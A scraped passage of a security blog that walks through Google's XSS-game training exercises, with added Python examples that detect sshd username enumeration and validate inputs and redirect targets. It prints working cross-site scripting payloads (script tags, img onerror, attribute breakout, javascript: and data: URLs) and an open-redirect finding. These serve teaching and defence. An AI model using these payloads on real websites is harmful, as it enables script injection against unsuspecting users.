<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR9HtjwiRaxEpqZlNebWp0-6NiX7uMFm8ZaM55VS7iPvsK1KktZE9Y_c_NzJI73yj8SmcX4bxoUPygI62CxNj8vA__UvrElN8wc-J3ROwYgEweV2v1SoDouZz6pRb6j8iYaCjd_mykDk/s1600/Osueta_last.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKR9HtjwiRaxEpqZlNebWp0-6NiX7uMFm8ZaM55VS7iPvsK1KktZE9Y_c_NzJI73yj8SmcX4bxoUPygI62CxNj8vA__UvrElN8wc-J3ROwYgEweV2v1SoDouZz6pRb6j8iYaCjd_mykDk/s1600/Osueta_last.png" /></a></div>
<br />
<br /></div>
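On the server side, the calibration run described above (10 random usernames) and a list-based run both leave sshd log lines of the form <code>Invalid user &lt;name&gt; from &lt;ip&gt;</code>, while the long-password probe against a valid account logs only an ordinary <code>Failed password for &lt;name&gt;</code>. The following is an added example, not part of the post or of Osueta: it flags any source address that tries at least a threshold of distinct non-existent usernames inside a short window. The log lines are constructed for the example (the host name <code>fw</code>, the addresses and the usernames are made up), and the window and threshold are assumptions to tune for your own environment.

```python
"""Spot username-enumeration bursts in sshd log lines.

Added example for this post; not code from Osueta. The log lines below are
constructed, including the host name, addresses and usernames.
"""
import re
from collections import defaultdict
from datetime import datetime

# Matches the "Invalid user" line sshd writes for a non-existent username
# (the "port N" suffix is optional because older versions omit it).
INVALID_USER_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Invalid user (?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Constructed sample: a 12-name probe from one source within a few seconds,
# then a failed password for a real account from the same source, and a
# single harmless mistyped username from somewhere else.
_PROBED = ["qzvlk", "mxwpo", "tgbhj", "ewcsa", "lpoiu", "nbvcx",
           "asdfg", "hjklq", "zxcvb", "poiuy", "mnbvc", "wertq"]
SAMPLE_LOG = [
    f"Jun  6 08:56:{i:02d} fw sshd[{4000 + i}]: Invalid user {u} from 10.0.0.5 port {51000 + i}"
    for i, u in enumerate(_PROBED)
] + [
    "Jun  6 08:56:20 fw sshd[4020]: Failed password for jnieto from 10.0.0.5 port 51020 ssh2",
    "Jun  6 08:57:02 fw sshd[4100]: Invalid user admin from 192.0.2.7 port 40001",
]


def parse_invalid_user(line):
    """Return (timestamp, username, source_ip) for an 'Invalid user' line, else None."""
    m = INVALID_USER_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the default year is fine for windowing
    ts = datetime.strptime(re.sub(r"\s+", " ", m["ts"]), "%b %d %H:%M:%S")
    return ts, m["user"], m["ip"]


def find_enumeration(lines, window_seconds=60, threshold=10):
    """Return {source_ip: distinct_usernames} for every source that tried at
    least `threshold` distinct non-existent usernames in some `window_seconds` span."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_invalid_user(line)
        if parsed:
            ts, user, ip = parsed
            events[ip].append((ts, user))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        best = 0
        for i, (start, _) in enumerate(evs):       # sliding window over sorted events
            seen = set()
            for ts, user in evs[i:]:
                if (ts - start).total_seconds() > window_seconds:
                    break
                seen.add(user)
            best = max(best, len(seen))
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```

Counting distinct usernames rather than raw attempts keeps a single user who mistypes their own name out of the result; the threshold of 10 matches the number of random names the tool tries before it starts on the real list.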
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com3tag:blogger.com,1999:blog-3160485247929481680.post-67429714879174220022014-06-06T08:56:00.000-07:002014-06-06T09:00:21.182-07:00XSS-game by Google exercises 4, 5 and 6.<br />
<div style="text-align: justify;">
In the previous post we talked about how to solve exercises <a href="http://www.behindthefirewalls.com/2014/06/xss-game-by-google-exercises-1-2-and-3.html" target="_blank">1, 2 and 3 of the XSS-game</a> proposed by Google. Now, we are going to solve the last three. </div>
<h2>
Exercise 4 </h2>
<div class="separator" style="clear: both; text-align: justify;">
This exercise is similar to the previous one (Exercise 3). The main difference is that now we have an input field. </div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuKCcf3878-OIdG1-OVSAyTVB7PFfsewdocLY19QXG_DbdW581NBU1V-858t8IzC9sgm62mxRE2_P7S4MH1DrcA2Sw4W1oS9cHyVWO6pKli_e78brSWacVgz9W1iZ4vx-rO7RbmnZz3h0/s1600/XSS_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuKCcf3878-OIdG1-OVSAyTVB7PFfsewdocLY19QXG_DbdW581NBU1V-858t8IzC9sgm62mxRE2_P7S4MH1DrcA2Sw4W1oS9cHyVWO6pKli_e78brSWacVgz9W1iZ4vx-rO7RbmnZz3h0/s1600/XSS_4.png" /></a></div>
The box expects a number to be typed into it, but... what happens if we write a name instead of a number?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPfCwJFt-NJouIPki7ju4plwjt-GqqSSe0iJnTtgjcwoRWURt7eptRq4ARJqMw2uEkaMbc7Iuyj6iz0zoX-hjnhyLKHjjAhbqOEoGBQXzPo-JOn_shwYPTbGvrmPHXoHYmg_-x6pSx-k/s1600/XSS4_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQPfCwJFt-NJouIPki7ju4plwjt-GqqSSe0iJnTtgjcwoRWURt7eptRq4ARJqMw2uEkaMbc7Iuyj6iz0zoX-hjnhyLKHjjAhbqOEoGBQXzPo-JOn_shwYPTbGvrmPHXoHYmg_-x6pSx-k/s1600/XSS4_1.png" height="155" width="640" /></a></div>
<br />
<br />
What happens is that our string has been included in the "img" tag...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqCHVA9JxrdKzeq7pmuvnSL98p3MafBHh9mKgG5oFFc0BrasVZRbJEyFz5905dmUSNW0ikKpOwXY2yQW6fQtpcSdNYKIx6PyeeZhkUvUTRI66hEx9PadEJPFEkdHeSbhpCdkZa9sV2RAU/s1600/XSS_4_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqCHVA9JxrdKzeq7pmuvnSL98p3MafBHh9mKgG5oFFc0BrasVZRbJEyFz5905dmUSNW0ikKpOwXY2yQW6fQtpcSdNYKIx6PyeeZhkUvUTRI66hEx9PadEJPFEkdHeSbhpCdkZa9sV2RAU/s1600/XSS_4_2.png" /></a></div>
<br />
So, if we use <span style="font-family: "Courier New",Courier,monospace;">3');alert('Behindthefirewalls</span> the result would be...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWXKFosH-XVpvYg8A6W47ZQHgIahMZ_yyb7jX9eSP7vuNnQ1YDDWO0OvGdrnwj2AZOo9xHjcMz7II6ERTH1pPsYf3odZ4C1GFGpHivA62myoTT4AB9dp4idH2Ho_d4D-BeWDaEv7lRoHE/s1600/XSS4_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWXKFosH-XVpvYg8A6W47ZQHgIahMZ_yyb7jX9eSP7vuNnQ1YDDWO0OvGdrnwj2AZOo9xHjcMz7II6ERTH1pPsYf3odZ4C1GFGpHivA62myoTT4AB9dp4idH2Ho_d4D-BeWDaEv7lRoHE/s1600/XSS4_4.png" /></a></div>
<br />
<br />
And the alert appears...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDg3wZFbO0fm_rZx3QTkzXbr2dFAE9QT04C144oNqr8ZFRiZijNeyA46eybMbuaZaKyBHtVk8JA9GqfjbGcNaLSVNHo33WTnE4OC5UZDyXP-Awn02WQNOozFis8Xfn-hgiWFAPSBJU_Uc/s1600/XSS_4_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDg3wZFbO0fm_rZx3QTkzXbr2dFAE9QT04C144oNqr8ZFRiZijNeyA46eybMbuaZaKyBHtVk8JA9GqfjbGcNaLSVNHo33WTnE4OC5UZDyXP-Awn02WQNOozFis8Xfn-hgiWFAPSBJU_Uc/s1600/XSS_4_3.png" height="271" width="640" /></a></div>
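Server-side, the defect in exercise 4 is that the value typed into the box is dropped into a quoted JavaScript string inside the image's <code>onload</code> attribute without checking that it is a number. The following added example, written for this post and not code from the XSS game, reproduces that template shape (an assumption based on the screenshot; the function name <code>startTimer</code>, the image path and the six-digit limit are this example's own choices) and contrasts it with a version that accepts only a plain integer and still encodes the value for the JavaScript and attribute contexts.

```python
"""Exercise 4: untrusted value inside a JavaScript string in an onload attribute.

Added example for this post; not code from the XSS game. The template shape
(value inside startTimer('...') in an img onload attribute), the name
startTimer and the image path are assumptions taken from the screenshot.
"""
import html
import json
import re

PAYLOAD = "3');alert('Behindthefirewalls"   # the string used in the post


def render_vulnerable(timer):
    """Drops the raw value into the quoted JS string, as the exercise does."""
    return f"<img src=\"/static/loading.gif\" onload=\"startTimer('{timer}');\" />"


def parse_timer(raw):
    """Accept only a plain non-negative integer (at most six digits, an
    arbitrary limit chosen for this example); anything else is rejected."""
    if not re.fullmatch(r"\d{1,6}", raw or ""):
        return None
    return int(raw)


def render_safe(raw):
    """Validate first; then encode for the JS-string context and for the
    HTML-attribute context around it, even though an int needs neither."""
    timer = parse_timer(raw)
    if timer is None:
        return None      # caller shows an error; nothing from the input reaches the page
    js_arg = json.dumps(timer)                                   # JS literal
    attr = html.escape(f"startTimer({js_arg});", quote=True)    # attribute value
    return f"<img src=\"/static/loading.gif\" onload=\"{attr}\" />"


def handler_statements(markup):
    """Number of ';'-terminated statements in the onload handler; more than
    one means the input has broken out of the string literal."""
    m = re.search(r'onload="([^"]*)"', markup)
    return m.group(1).count(";") if m else 0


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD), handler_statements(render_vulnerable(PAYLOAD)))
    print(render_safe(PAYLOAD), render_safe("3"))
```

Validation does the real work here (a value that is only digits cannot contain a quote), and the two encoding steps are defence in depth for the day somebody changes the parameter to accept free text.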
<h2>
Exercise 5 </h2>
<div style="text-align: justify;">
I don't know what the reason for looking at "next=confirm" was at first, because logic would dictate that the first attempt would be to try to exploit an XSS vulnerability in the input field...</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-yE1VOZYGkRdF_pXGBAFsrSC-Nef4YA8OKsZNSkVxfl3wl6w6v9O3BHPCyF__x7LJ3PPQNdMfu_9uLz6UobPISWz3o-fFDJQ5cgI7xUIhgbyn2-tkW2C3eaIEDvz24M3Kau2WYoMeJmw/s1600/XSS5_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-yE1VOZYGkRdF_pXGBAFsrSC-Nef4YA8OKsZNSkVxfl3wl6w6v9O3BHPCyF__x7LJ3PPQNdMfu_9uLz6UobPISWz3o-fFDJQ5cgI7xUIhgbyn2-tkW2C3eaIEDvz24M3Kau2WYoMeJmw/s1600/XSS5_1.png" height="226" width="640" /></a></div>
<br />
<div style="text-align: justify;">
But the first thing that I did was to replace "confirm" with "http://www.behindthefirewalls", reload the page, type my e-mail and click on "Next", and the result was that I was redirected to my blog...</div>
<div style="text-align: justify;">
<br /></div>
<span style="font-family: "Courier New",Courier,monospace;">https://xss-game.appspot.com/level5/frame/signup?next=http://www.behindthefirewalls.com</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5B93ptRxIjTbkSNMhznH9gugHYqNtgz3tqn44hVl6X7NgjAIMJOBd-KSE1e0Tc6VNvpE3GKneAgKiSpVOZCAWH5dbvM9Eux7LLAdnfPSOk8UurTLSOeF-QEEM_U-jCcnE7o5rv2Eohq8/s1600/XSS3_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5B93ptRxIjTbkSNMhznH9gugHYqNtgz3tqn44hVl6X7NgjAIMJOBd-KSE1e0Tc6VNvpE3GKneAgKiSpVOZCAWH5dbvM9Eux7LLAdnfPSOk8UurTLSOeF-QEEM_U-jCcnE7o5rv2Eohq8/s1600/XSS3_2.png" height="222" width="640" /></a></div>
<br />
<div style="text-align: justify;">
We have discovered another security issue, but what we want to do is locate an XSS vulnerability.</div>
<br />
<div style="text-align: justify;">
I was trying different options with no success so I decided to read the hints offered by Google. "If you want to make clicking a link execute Javascript (without using
the <code>onclick</code> handler), how can you do it?"</div>
<br />
<div style="text-align: justify;">
<span style="font-family: inherit;">So I tried to use:</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: "Courier New",Courier,monospace;">next=javascript:alert("behindthefirewalls")</span></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-family: inherit;">And the alert appeared.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPgQWLtCXRmJgmp3u8HI7JJNM5g6Nnfa8qfIA3SwGZiDmJvK5raElGikmvZFxmI7U64Uj-D9Mqqw8vCmjCEaGNFwDCn5TycKZXpBuPOb55fEP8e7ETkpEh7Xvf4KPLipFxi39w_Sxgg6c/s1600/XSS5_9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPgQWLtCXRmJgmp3u8HI7JJNM5g6Nnfa8qfIA3SwGZiDmJvK5raElGikmvZFxmI7U64Uj-D9Mqqw8vCmjCEaGNFwDCn5TycKZXpBuPOb55fEP8e7ETkpEh7Xvf4KPLipFxi39w_Sxgg6c/s1600/XSS5_9.PNG" height="244" width="640" /></a></div>
<h2>
Exercise 6 </h2>
<div style="text-align: justify;">
The fourth hint says: "If you can't easily host your own evil JS file, see if google.com/jsapi?callback=foo will help you here."</div>
<br />
<div style="text-align: justify;">
If we replace "foo" with "alert", the response of <a href="http://www.google.com/jsapi?callback=alert" target="_blank">www.google.com/jsapi?callback=alert</a> will include in its code:</div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMn6q66WdolD9NUynpxvRxrcq09CJv9FXOdCeRzL-zmjsAL6Bo-OfFZXZBJayW2027WCZj8IWdQgPAz8Ud4KEotViS29_s865f2CF8JuiYsQslGEokTb8oQO5cSLjzjqzukFHe3Tg_dJg/s1600/XSS_6_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMn6q66WdolD9NUynpxvRxrcq09CJv9FXOdCeRzL-zmjsAL6Bo-OfFZXZBJayW2027WCZj8IWdQgPAz8Ud4KEotViS29_s865f2CF8JuiYsQslGEokTb8oQO5cSLjzjqzukFHe3Tg_dJg/s1600/XSS_6_0.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
So, if we use the link below, we can exploit the vulnerability.<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">frame#//www.google.com/jsapi?callback=alert </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXLMSl12HIHOLCAUSK-vul9UBWhiwoQ0i-YTTLYrI48K4jtwHbcVcClq8Q_1j7WyC-8TPhwsCrudh_SCEbK6OYS6D8WUs5-BigN-fmkGvnjJ_5iNXW7rFkqB0cNCvgAnfM-kkMTDmVw8/s1600/XSS_0_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXLMSl12HIHOLCAUSK-vul9UBWhiwoQ0i-YTTLYrI48K4jtwHbcVcClq8Q_1j7WyC-8TPhwsCrudh_SCEbK6OYS6D8WUs5-BigN-fmkGvnjJ_5iNXW7rFkqB0cNCvgAnfM-kkMTDmVw8/s1600/XSS_0_1.png" height="248" width="640" /></a></div>
<br />
<br />
I spent some time trying to solve this exercise in a different way. I tried a lot of possibilities to exploit an XSS vulnerability...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpwfQgfUxet9ZWzozvL72fmEH0l4EHbjTJKZX_7mz5viv4vfuLHGZ2eQxxFHRpuzmtQP7JXl6ZKUl6wHos5XwW7YKBoEozN5-xVunqiV8Cf0rJEmr_x2Fz8_tKc6Q3zLt5UJdI7Le8po/s1600/XSS6_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNpwfQgfUxet9ZWzozvL72fmEH0l4EHbjTJKZX_7mz5viv4vfuLHGZ2eQxxFHRpuzmtQP7JXl6ZKUl6wHos5XwW7YKBoEozN5-xVunqiV8Cf0rJEmr_x2Fz8_tKc6Q3zLt5UJdI7Le8po/s1600/XSS6_1.png" height="204" width="640" /></a></div>
<br />
<br />
... until I remembered a post I read some months ago... <br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">#data:text/javascript,alert('behindthefirewalls')</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKFp9H0V8IcVMrcHXQ-PmL5Tdyce0K4c-8lSI4etnfKZZtkbDgl4koic6eFE7l9jcLEG4nav1DnTUqNxJdbvBvXUI1tyiraZyqD3aG2rrbWDVW3dXQS9t1ypPhuIQ7iHXkyERy7GOWGgg/s1600/XSS6_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKFp9H0V8IcVMrcHXQ-PmL5Tdyce0K4c-8lSI4etnfKZZtkbDgl4koic6eFE7l9jcLEG4nav1DnTUqNxJdbvBvXUI1tyiraZyqD3aG2rrbWDVW3dXQS9t1ypPhuIQ7iHXkyERy7GOWGgg/s1600/XSS6_2.png" height="242" width="640" /></a></div>
<br />
<br />
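Exercises 5 and 6 are both cases of the page navigating to, or loading code from, a URL taken straight from the request: the <code>next</code> parameter in exercise 5 (an absolute URL redirects off-site, a <code>javascript:</code> URL runs script) and the fragment in exercise 6 (a protocol-relative <code>//</code> URL or a <code>data:</code> URL is fetched as a script). One validator covers both. The following is an added example, not part of the post or of the game: it resolves the raw value against the signup URL quoted above and accepts the result only if it stays on that origin, and for scripts additionally requires the path to be on a fixed allowlist. The allowlist contents, and the up-front rejection of whitespace, control characters and backslashes (which browsers strip or normalise in ways <code>urllib</code> does not), are this example's own choices.

```python
"""Exercises 5 and 6: keep a request-supplied navigation or script target on-origin.

Added example for this post; not code from the XSS game. BASE_URL is the
signup page quoted in the post; ALLOWED_SCRIPTS is a constructed allowlist.
"""
from urllib.parse import urljoin, urlsplit

BASE_URL = "https://xss-game.appspot.com/level5/frame/signup"
ALLOWED_SCRIPTS = {"/static/game-frame.js"}   # constructed; the page's own scripts go here


def same_origin_path(raw, base=BASE_URL):
    """Resolve `raw` against `base` and return path[?query] if the result stays
    on the same scheme and host; otherwise None.

    Absolute URLs (http://...), scheme-only URLs (javascript:, data:) and
    protocol-relative ones (//host/...) all change the origin and are refused.
    Whitespace, control characters and backslashes are refused up front because
    browsers strip or normalise them in ways urllib does not.
    """
    if not raw or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in raw) or "\\" in raw:
        return None
    target = urlsplit(urljoin(base, raw))
    origin = urlsplit(base)
    if (target.scheme, target.netloc) != (origin.scheme, origin.netloc):
        return None
    path = target.path or "/"
    return path + ("?" + target.query if target.query else "")


def safe_next(raw):
    """Exercise 5: where the signup form may redirect after 'Next'."""
    return same_origin_path(raw)


def safe_script(raw):
    """Exercise 6: which script the page may load from its fragment; besides
    staying on-origin, the path must be on the allowlist."""
    path = same_origin_path(raw)
    return path if path in ALLOWED_SCRIPTS else None


if __name__ == "__main__":
    for value in ("confirm", "http://www.behindthefirewalls.com",
                  'javascript:alert("behindthefirewalls")',
                  "//www.google.com/jsapi?callback=alert",
                  "data:text/javascript,alert('behindthefirewalls')"):
        print(repr(value), "->", safe_next(value), safe_script(value))
```

Returning only the path and query (never the scheme or host) means the redirect the application finally issues is relative by construction, so even a mistake elsewhere in the validator cannot produce an off-site Location header.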
<br />Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com3tag:blogger.com,1999:blog-3160485247929481680.post-80788528766630200772014-06-04T23:43:00.000-07:002014-06-04T23:47:14.291-07:00 XSS-game by Google exercises 1, 2 and 3.<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
As Google says, "Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps..."</div>
<br />
<div style="text-align: justify;">
So they have decided to help us learn how to exploit these kinds of vulnerabilities by creating a vulnerable web site at:<br />
<br />
<a href="https://xss-game.appspot.com/" target="_blank">https://xss-game.appspot.com/</a></div>
<br />
There are 6 exercises to solve. Before starting to solve them... Why should I know how to exploit an XSS vulnerability?<br />
<br />
<ol>
<li>To be more qualified in the security field.</li>
<li>To make money.</li>
</ol>
<div style="text-align: justify;">
Currently, Google is paying up to $7,500 for dangerous XSS bugs discovered in their most sensitive products.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8Id4TS_qpHAt5GQKPIKbrw8_4uM_loLGqWFaYkK4VaPl1QwmGwXvQSPgd2Z0i97jOECBeJ8eq-XKWCtNRJTGJOVjVsrNLrmXs0hz5HgAZ72GecGK1p7Rc0QVgH7UVWx3dgDEd3__qCE/s1600/Google_Rewards.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz8Id4TS_qpHAt5GQKPIKbrw8_4uM_loLGqWFaYkK4VaPl1QwmGwXvQSPgd2Z0i97jOECBeJ8eq-XKWCtNRJTGJOVjVsrNLrmXs0hz5HgAZ72GecGK1p7Rc0QVgH7UVWx3dgDEd3__qCE/s1600/Google_Rewards.png" height="194" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But Google is not the only one paying a bounty for disclosing vulnerabilities. Others like Yahoo, Facebook or PayPal have the same policy of rewards for discovering bugs.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In this post, we are going to solve the first 3 exercises proposed by Google. In the next post, we will solve the remaining ones.</div>
<h2 style="text-align: justify;">
Exercise 1</h2>
<div style="text-align: justify;">
This is the easiest exercise. Our input is included directly in the page without proper escaping.</div>
<br />
By inserting the code below, we will be successful. <br />
<br />
<span style="font-family: "Courier New",Courier,monospace;"><script>alert('BehindTheFirewalls')</script></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx7eLmY86hsieTXXKIz40WimfhrFguCPWP9g5Y57iZziFeX0Dn4tTMgwQ6fgerMmCRSjcujgcJq-DHVUWMU4Q6oyOCXoRkStcO6No7zrv6uvyVf5FcHPZum5SG18BsqoitJLx_5bNBnOY/s1600/XSS_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx7eLmY86hsieTXXKIz40WimfhrFguCPWP9g5Y57iZziFeX0Dn4tTMgwQ6fgerMmCRSjcujgcJq-DHVUWMU4Q6oyOCXoRkStcO6No7zrv6uvyVf5FcHPZum5SG18BsqoitJLx_5bNBnOY/s1600/XSS_1.png" height="342" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6nWYiFHcDOonIuDVBMH1K7L0blrY7jWNtr_NIC_KOWx168QeIPh7nXkj3bePjJVK7eK1Z53U4NrebOJ_eSU6DU9y5znivaNo9A89W5sbBc564rVe7TlN6BIBjCo-QQ6VW2hFgALoq3Q/s1600/XSS_1_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw6nWYiFHcDOonIuDVBMH1K7L0blrY7jWNtr_NIC_KOWx168QeIPh7nXkj3bePjJVK7eK1Z53U4NrebOJ_eSU6DU9y5znivaNo9A89W5sbBc564rVe7TlN6BIBjCo-QQ6VW2hFgALoq3Q/s1600/XSS_1_2.png" height="342" width="640" /></a></div>
<br />
<h2 style="text-align: justify;">
Exercise 2</h2>
<div style="text-align: justify;">
This exercise is an example of how to perform a persistent or stored Cross-Site Scripting attack in a simple way.</div>
<br />
<span style="font-family: "Courier New",Courier,monospace;"><img src=x onerror=alert('BehindTheFirewalls')></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3dWoT-hlC3R1Rjweh6Az3dRc6kHEY9DSdFbkdctz6JjT31FQZ-3NfMtaklpCZ7o5v25ITQII99M-SqNCOhPishd-xkS-8sOZ20BGiB_NN2Vq_PfJ9JbWgAy6acHG0r4MJMFxP4IkuZA/s1600/XSS2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM3dWoT-hlC3R1Rjweh6Az3dRc6kHEY9DSdFbkdctz6JjT31FQZ-3NfMtaklpCZ7o5v25ITQII99M-SqNCOhPishd-xkS-8sOZ20BGiB_NN2Vq_PfJ9JbWgAy6acHG0r4MJMFxP4IkuZA/s1600/XSS2.png" height="342" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtqkDIcBcVJoBIZoVFzjgskkJNHJQGH_FTzRFX1eapCL2ae07ZjZGvkcfksXrs9Lj9PcBlcmiRookNOySJIdwN0HZxq2meoC3fPxTJZn3DTRZ6UCEl1Ctam-YUrWLEliMBzjRTJRNS62o/s1600/XSS2_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtqkDIcBcVJoBIZoVFzjgskkJNHJQGH_FTzRFX1eapCL2ae07ZjZGvkcfksXrs9Lj9PcBlcmiRookNOySJIdwN0HZxq2meoC3fPxTJZn3DTRZ6UCEl1Ctam-YUrWLEliMBzjRTJRNS62o/s1600/XSS2_1.png" height="342" width="640" /></a></div>
<h2 style="text-align: justify;">
Exercise 3</h2>
<div style="text-align: justify;">
This exercise is a little more complex because there is no input field through which to try the XSS. </div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0s2PX-w97BPUX7DnqsKqiVtAmstDv1Mef5PraGVXFY7zZy1HmD9ztPGh7p0XqRGc4Qx0RCvCowfmqhgCNtfGTsrg5R6plxuGHIAAxCu4h_LnjBFpKyYEuk1bOHdo8iI5_QPPxJamCbU/s1600/XSS3_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB0s2PX-w97BPUX7DnqsKqiVtAmstDv1Mef5PraGVXFY7zZy1HmD9ztPGh7p0XqRGc4Qx0RCvCowfmqhgCNtfGTsrg5R6plxuGHIAAxCu4h_LnjBFpKyYEuk1bOHdo8iI5_QPPxJamCbU/s1600/XSS3_0.png" height="362" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
But what happens if we rewrite the URI? If we change "#1" to "#11111"...</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
